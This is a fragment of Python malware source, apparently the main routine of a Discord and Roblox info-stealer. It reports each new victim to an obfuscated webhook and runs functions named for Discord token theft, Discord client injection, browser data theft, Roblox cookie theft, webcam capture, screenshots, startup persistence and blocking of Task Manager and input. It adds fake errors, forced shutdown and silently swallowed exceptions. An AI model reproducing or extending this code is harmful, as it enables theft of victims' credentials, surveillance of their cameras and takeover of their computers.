try: requests.post(PTUGQSXYYQRVUXAQTVBEUHRVYOCRRPRXITWHNZTMFWZKVOLIDOJQSQJYTUXBGCAPTLMSERXVDRQEHYEN, json={'content': f'****╔═════════════════Victim Affected═════════════════╗****', 'username': CMKPWIFCSFCTSNNVOGCCKVQEYKRAXRHOBFRMIJVXPYIPEACUDGZUIXNGDSPUGBWRSLWEMRRWYXKICA, 'avatar_url': VBKGDSUSVCQABAPEKXIUZFQODIVCHJYRJSRNZJISFBCGLICNMWIBJILFXFCLOLTTJAZIHTTVAOM,})
except: pass
try: threading.Thread(target=B10ck_K3y).start()
except: pass
try: threading.Thread(target=B10ck_T45k_M4n4g3r).start()
except: pass
try: threading.Thread(target=B10ck_W3b5it3).start()
except: pass
try: threading.Thread(target=St4rtup).start()
except: pass
try: Sy5t3m_Inf0()
except: pass
try: Di5c0rd_T0k3n()
except: pass
try: Di5c0rd_inj3c710n()
except: pass
try: Br0w53r_5t341()
except: pass
try: R0b10x_C00ki3()
except: pass
try: C4m3r4_C4ptur3()
except: pass
try: Op3n_U53r_Pr0fi13_53tting5()
except: pass
try: Scr33n5h0t()
except: pass
try: requests.post(PTUGQSXYYQRVUXAQTVBEUHRVYOCRRPRXITWHNZTMFWZKVOLIDOJQSQJYTUXBGCAPTLMSERXVDRQEHYEN, json={'content': f'****╚══════════════════{TWLWNCOIZJYFVJJVNOBLNIRTPRPMHUIZTHOAAFCWSGDVYEXJKNUBPR}══════════════════╝****', 'username': CMKPWIFCSFCTSNNVOGCCKVQEYKRAXRHOBFRMIJVXPYIPEACUDGZUIXNGDSPUGBWRSLWEMRRWYXKICA, 'avatar_url': VBKGDSUSVCQABAPEKXIUZFQODIVCHJYRJSRNZJISFBCGLICNMWIBJILFXFCLOLTTJAZIHTTVAOM})
except: pass
try: threading.Thread(target=Sp4m_Opti0ns).start()
except: pass
try: threading.Thread(target=R3st4rt).start()
except: pass
try: threading.Thread(target=F4k3_3rr0r).start()
except: pass
try: threading.Thread(target=Shutd0wn).start()
except: pass
Clear()
